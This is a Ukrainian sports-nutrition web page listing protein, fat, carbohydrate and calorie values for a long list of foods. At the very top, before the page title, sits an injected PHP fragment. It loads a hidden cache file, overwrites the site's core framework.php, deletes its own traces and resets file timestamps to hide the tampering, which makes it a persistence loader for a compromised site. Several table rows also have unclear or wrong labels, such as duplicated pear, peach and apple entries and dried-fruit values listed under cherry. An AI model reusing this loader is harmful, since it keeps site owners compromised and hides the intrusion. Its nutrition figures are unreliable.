$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Таблиця складу та калорійності продуктів | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Таблиця складу та калорійності продуктів

За допомогою даної таблиці ви можете вирахувати кількість білків, жирів, вуглеводів та енергетичну цінність у кілокалоріях свого раціону.

Продукт

Білки

гр.

Жири

гр.

Вуглеводи
гр.

Ккал

Абрикоси

0.9

0.0

10.5

45

Аґрус

0.7

0.0

9.9

42

Айва

0.6

0.0

8.9

38

Алича

0.2

0.0

7.4

30

Ананас

0.4

0.0

11.8

48

Апельсин

0.9

0.0

8.4

37

Арахіс

26.3

45.2

9.7

550

Баклажани

0.6

0.1

5.5

25

Банани

1.5

0.0

22.0

94

Баранина

16.3

15.3

0.0

202

Борошно пшеничне 1 ґатунку

10.6

1.3

73.2

346

Борошно пшеничне 2 ґатунку

11.7

1.8

70.8

346

Борошно пшеничне вищого ґатунку

10.3

0.9

74.2

346

Борошно житнє

6.9

1.1

76.9

345

Бублик

10.0

2.0

69.0

334

Боби

6.0

0.1

8.3

58

Брусниця

0.7

0.0

8.6

37

Бринза

17.9

20.1

0.0

252

Бруква

1.2

0.1

8.1

38

Бички (риба)

12.8

8.1

5.2

144

Буряк

1.7

0.0

10.8

50

Вафлі з жиромісними начинками

3.0

30.0

64.0

538

Вафлі с фруктовими начинками

3.0

5.0

80.0

377

Виноград

1.0

1.0

18.0

85

Вишня

1.5

0.0

73.0

298

Вим’я яловиче

12.3

13.7

0.0

172

Вершки 10% жирності

3.0

10.0

4.0

118

Вершки 20% жирності

2.8

20.0

3.6

205

Вугільна риба

13.2

11.6

0.0

157

Вугор

14.5

30.5

0.0

332

Вугор морський

19.1

1.9

0.0

93

Геркулес

13.1

6.2

65.7

371

Голубика

1.0

0.0

7.7

34

Горбуша

21.0

7.0

0.0

147

Горобина червона

1.4

0.0

12.5

55

Горобина чорноплідна

1.5

0.0

12.0

54

Горох лущений

23.0

1.6

57.7

337

Горох цілий

23.0

1.2

53.3

316

Горох зелений

5.0

0.2

13.3

75

Гранат

0.9

0.0

11.8

50

Грейпфрут

0.9

0.0

7.3

32

Грецький горіх

13.8

61.3

10.2

647

Гриби білі свіжі

3.2

0.7

1.6

25

Гриби білі сушені

27.6

6.8

10.0

211

Гриби підберезники свіжі

2.3

0.9

3.7

32

Гриби підосиновики свіжі

3.3

0.5

3.4

31

Гриби сироїжки свіжі

1.7

0.3

1.4

15

Грудинка сирокопчена

7.6

66.8

0.0

631

Груша

0.4

0.0

10.7

44

Груша

2.3

0.0

62.1

257

Гусятина

16.1

33.3

0.0

364

Драже фруктове

3.7

10.2

73.1

399

Жир тваринний топлений

0.0

99.7

0.0

897

Жито

11.0

2.0

67.0

330

Журавлина

0.5

0.0

4.8

21

Здобна випічка

8.0

15.0

50.0

367

Зелена квасоля (стручок)

4.0

0.0

4.3

33

Зефір

0.8

0.0

78.3

316

Ізюм

2.3

0.0

71.2

294

Ікра кети зерниста

31.6

13.8

0.0

250

Ікра ляща пробійна

24.7

4.8

0.0

142

Ікра минтая пробійна

28.4

1.9

0.0

130

Ікра осетрова зерниста

28.9

9.7

0.0

202

Ікра осетрова пробійна

36.0

10.2

0.0

235

Індичка

21.6

12.0

0.8

197

Інжир

0.7

0.0

13.9

58

Ірис

3.3

7.5

81.8

407

Йогурт натуральний 1.5% жирності

5.0

1.5

3.5

47

Кабачки

0.6

0.3

5.7

27

Кавун

0.5

0.2

6.0

27

Кальмар

18.0

0.3

0.0

74

Камбала

16.1

2.6

0.0

87

Капуста білокочанна

1.8

0.0

5.4

28

Капуста кольорова

2.5

0.0

4.9

29

Карамель

0.0

0.1

77.7

311

Карась

17.7

1.8

0.0

87

Карп

16.0

3.6

0.0

96

Картопля

2.0

0.1

19.7

87

Качатина

16.5

31.0

0.0

345

Квасоля

22.3

1.7

54.5

322

Кета

22.0

5.6

0.0

138

Кефір жирний

2.8

3.2

4.1

56

Кефір нежирний

3.0

0.1

3.8

28

Кизил

1.0

0.0

9.7

42

Кисляк

2.8

3.2

4.1

56

Ковбаса варена Докторська

13.7

22.8

0.0

260

Ковбаса варена Любительська

12.2

28.0

0.0

300

Ковбаса варена Молочна

11.7

22.8

0.0

252

Ковбаса варена Окрема

10.1

20.1

1.8

228

Ковбаса варена Теляча

12.5

29.6

0.0

316

Ковбаса варено-копчена Любительська

17.3

39.0

0.0

420

Ковбаса варено-копчена Сервелат

28.2

27.5

0.0

360

Ковбаса напівкопчена Краківська

16.2

44.6

0.0

466

Ковбаса напівкопчена Мінська

23.0

17.4

2.7

259

Ковбаса напівкопчена Полтавська

16.4

39.0

0.0

416

Ковбаса напівкопчена Українська

16.5

34.4

0.0

375

Ковбаса сирокопчена Любительська

20.9

47.8

0.0

513

Ковбаса сирокопчена Московська

24.8

41.5

0.0

472

Ковбасний фарш

15.2

15.7

2.8

213

Конина

20.2

7.0

0.0

143

Корейка сирокопчена

10.5

47.2

0.0

466

Корюшка

15.5

3.2

0.0

90

Краб

16.0

0.5

0.0

68

Креветки

22.0

1.0

0.0

97

Крижана

15.5

1.4

0.0

74

Кролик

20.7

12.9

0.0

198

Крупа гречана

12.6

2.6

68.0

345

Крупа кукурудзяна

8.3

1.2

75.0

344

Крупа манна

11.3

0.7

73.3

344

Крупа вівсяна

12.0

6.0

67.0

370

Крупа перлова

9.3

1.1

73.7

341

Крупа пшенична

12.7

1.1

70.6

343

Крупа ячна

10.4

1.3

71.7

340

Курага

5.2

0.0

65.9

284

Курка

20.8

8.8

0.6

164

Курчата

18.7

7.8

0.4

146

Лящ

17.1

4.1

0.0

105

Лимон

0.9

0.0

3.6

18

Майонез

3.1

67.0

2.6

625

Макаронні вироби

11.0

0.9

74.2

348

Макрурус

13.2

0.8

0.0

60

Малина

0.8

0.0

9.0

39

Мандарин

0.8

0.0

8.6

37

Маргарин бутербродний

0.5

82.0

1.2

744

Маргарин молочний

0.3

82.3

1.0

745

Мармелад

0.0

0.1

77.7

311

Масло рослинне

0.0

99.9

0.0

899

Масло вершкове

0.6

82.5

0.9

748

Масло топлене

0.3

98.0

0.6

885

Маса сирна

7.1

23.0

27.5

345

Мед

0.8

0.0

80.3

324

Мигдаль

18.6

57.7

13.6

648

Мінога

14.7

11.9

0.0

165

Минтай

15.9

0.7

0.0

69

Минь

18.8

0.6

0.0

80

Мізки яловичі

9.5

9.5

0.0

123

Мойва

13.4

11.5

0.0

157

Молоко

2.8

3.2

4.7

58

Молоко ацидофільне

2.8

3.2

10.8

83

Молоко згущене

7.0

7.9

9.5

137

Молоко згущене з цукром

7.2

8.5

56.0

329

Молоко сухе цільне

25.6

25.0

39.4

485

Морква

1.3

0.1

7.0

34

Морошка

0.8

0.0

6.8

30

Морська капуста

0.9

0.2

3.0

17

Навага

16.1

1.0

0.0

73

Насіння соняшника

20.7

52.9

5.0

578

Нирки баранячі

13.6

2.5

0.0

76

Нирки яловичі

12.5

1.8

0.0

66

Нирки свинячі

13.0

3.1

0.0

79

Нототенія мармурова

14.8

10.7

0.0

155

Обліпиха

0.9

0.0

5.5

25

Огірки

0.8

0.0

3.0

15

Ожина

2.0

0.0

5.3

29

Окунь морський

17.6

5.2

0.0

117

Окунь річковий

18.5

0.9

0.0

82

Оливки

5.2

51.0

10.0

519

Оселедець

17.7

19.5

0.0

246

Осетер

16.4

10.9

0.0

163

Палтус

18.9

3.0

0.0

102

Пастила

0.5

0.0

80.4

323

Перець зелений солодкий

1.3

0.0

4.7

24

Перець червоний солодкий

1.3

0.0

5.7

28

Персики

0.6

0.0

16.0

66

Персики

3.0

0.0

68.5

286

Петрушка (зелень)

3.7

0.0

8.1

47

Петрушка (корінь)

1.5

0.0

11.0

50

Печінка бараняча

18.7

2.9

0.0

100

Печінка яловича

17.4

3.1

0.0

97

Печінка свиняча

18.8

3.6

0.0

107

Печінка тріски

4.0

66.0

0.0

610

Тістечко бісквітне з фруктовою начинкою

5.0

10.0

60.0

350

Тістечко листкове з кремом

5.0

40.0

46.0

564

Тістечко листкове з фруктовою начинкою

5.0

25.0

55.0

465

Полуниця, суниця

1.2

0.0

8.0

36

Помідори (томати)

1.0

0.2

3.7

20

Просо

9.1

3.8

70.0

350

Пряники

5.0

3.0

76.0

351

Путасу

16.1

0.9

0.0

72

Пшениця цільна

9.0

2.0

52.0

262

Пшоно

12.0

2.9

69.3

351

Ревінь

0.7

0.0

2.9

14

Редис

1.2

0.0

4.1

21

Редька

1.9

0.0

7.0

35

Ріпа

1.5

0.0

5.9

29

Рис

8.0

1.0

76.0

345

Риба-шабля

20.3

3.2

0.0

110

Рибець каспійський

19.2

2.4

0.0

98

Ряжанка

3.0

6.0

4.1

82

Сазан

18.4

5.3

0.0

121

Сайра

18.6

12.0

0.0

182

Салака

17.3

5.6

0.0

119

Салат

1.5

0.0

2.2

14

Сардельки яловичі

12.0

15.0

2.0

191

Сардельки свинячі

10.1

31.6

1.9

332

Свинина жирна

11.4

49.3

0.0

489

Свинина нежирна

16.4

27.8

0.0

315

Свинина худа

16.5

21.5

0.0

259

Свинина тушкована

15.0

32.0

0.0

348

Сьомга

20.8

15.1

0.0

219

Серце бараняче

13.5

2.5

0.0

76

Серце яловиче

15.0

3.0

0.0

87

Серце свиняче

15.1

3.2

0.0

89

Сиг

19.0

7.5

0.0

143

Сир голландський

27.0

40.0

0.0

468

Сир плавлений

24.0

45.0

0.0

501

Сир пошехонський

26.0

38.0

0.0

446

Сир російський

23.0

45.0

0.0

497

Сир швейцарський

25.0

37.0

0.0

433

Сир жирний

14.0

18.0

1.3

223

Сир нежирний

18.0

2.0

1.5

96

Сир знежирений

16.1

0.5

2.8

80

Сир напівжирний

16.7

9.0

1.3

153

Сирки сирні

7.1

23.0

27.5

345

Скумбрія

18.0

9.0

0.0

153

Слива садова

0.8

0.0

9.9

42

Сметана 10% жирності

3.0

10.0

2.9

113

Сметана 20% жирності

2.8

20.0

3.2

204

Смородина біла

0.3

0.0

8.7

36

Смородина червона

0.6

0.0

8.0

34

Смородина чорна

1.0

0.0

8.0

36

Сніданок туриста (яловичина)

20.5

10.4

0.0

175

Сніданок туриста (свинина)

16.9

15.4

0.0

206

Сом

16.8

8.5

0.0

143

Сосиски Молочні

12.3

25.3

0.0

276

Сосиски Російські

12.0

19.1

0.0

219

Сосиски Свинячі

11.8

30.8

0.0

324

Сочевиця

24.8

1.1

53.7

323

Соя

34.9

17.3

26.5

401

Ставрида

18.5

5.0

0.0

119

Стерлядь

17.0

6.1

0.0

122

Судак

19.0

0.8

0.0

83

Сухарі пшеничні

11.0

2.0

72.0

350

Сухарі вершкові

8.5

10.6

71.3

414

Сухий білок

73.3

1.8

7.0

337

Сухий жовток

34.2

52.2

4.4

624

Сушки

11.0

1.3

73.0

347

Телятина жирна

19.0

8.0

0.0

148

Телятина худа

20.0

1.0

0.0

89

Толокно

12.2

5.8

68.3

374

Торт бісквітний з фруктовою начинкою

4.7

20.0

49.8

398

Торт мигдальний

6.6

35.8

46.8

535

Трепанг

7.0

1.0

0.0

37

Тріска

17.5

0.6

0.0

75

Тунець

23.0

1.0

0.0

101

Урюк

5.0

0.0

67.5

290

Фініки

2.5

0.0

72.1

298

Фундук

16.1

66.9

9.9

706

Халва соняшникова

11.6

29.7

54.0

529

Халва тахін

12.7

29.9

50.6

522

Хек

16.6

2.2

0.0

86

Хліб пшеничний з борошна 1 ґатунку

7.7

2.4

53.4

266

Хліб житній

4.7

0.7

49.8

224

Хліб житній грубий

4.2

0.8

43.0

196

Хрін

2.5

0.0

16.3

75

Хурма

0.5

0.0

15.9

65

Цибуля зелена (перо)

1.3

0.0

4.3

22

Цибуля порей

3.0

0.0

7.3

41

Цибуля ріпчаста

1.7

0.0

9.5

44

Цукерки шоколадні

3.0

20.0

67.0

460

Цукор

0.0

0.0

99.9

399

Часник

6.5

0.0

21.2

110

Черемша

2.4

0.0

6.5

35

Черешня

1.1

0.0

12.3

53

Чорниця

1.1

0.0

8.6

38

Чорнослив

2.3

0.0

65.6

271

Шовковиця

0.7

0.0

12.7

53

Шинка

22.6

20.9

0.0

278

Шипшина свіжа

1.6

0.0

24.0

102

Шипшина сушена

4.0

0.0

60.0

256

Шоколад молочний

6.9

35.7

52.4

558

Шоколад темний

5.4

35.3

52.6

549

Шпик свинячий

1.4

92.8

0.0

840

Шпинат

2.9

0.0

2.3

20

Щавель

1.5

0.0

5.3

27

Щука

18.8

0.7

0.0

81

Яблука

3.2

0.0

68.0

284

Яблука

0.4

0.0

11.3

46

Язик яловичий

13.6

12.1

0.0

163

Язик свинячий

14.2

16.8

0.0

208

Язь

18.2

1.0

0.0

81

Яєчний порошок

45.0

37.3

7.1

544

Яйце куряче

12.7

11.5

0.7

157

Яйце перепелине

11.9

13.1

0.6

167

Яловичина

18.9

12.4

0.0

187

Яловичина тушкована

16.8

18.3

0.0

231

 

Незважаючи на те, що цифри в таблиці складу та калорійності продуктів наведені аж з точністю до десятих, треба пам'ятати, що вони все ж таки дуже приблизні. Вміст білків, жирів, вуглеводів і, відповідно, калорійність продукту залежить від багатьох факторів: від сорту продукту і від способу приготування, від тонкощів рецептури і особливостей технологічного процесу у різних виробників. Навіть, наприклад, від того, росла рослина в жарке чи в дощове літо.

Тому, підраховуючи по цим таблицям калорійність свого раціону і вміст поживних речовин (білків, жирів, вуглеводів) в уживаних продуктах, пам'ятайте, що отриманий результат ніколи не буде абсолютно точним.
 
Спортивне харчування Таблиця складу та калорійності продуктів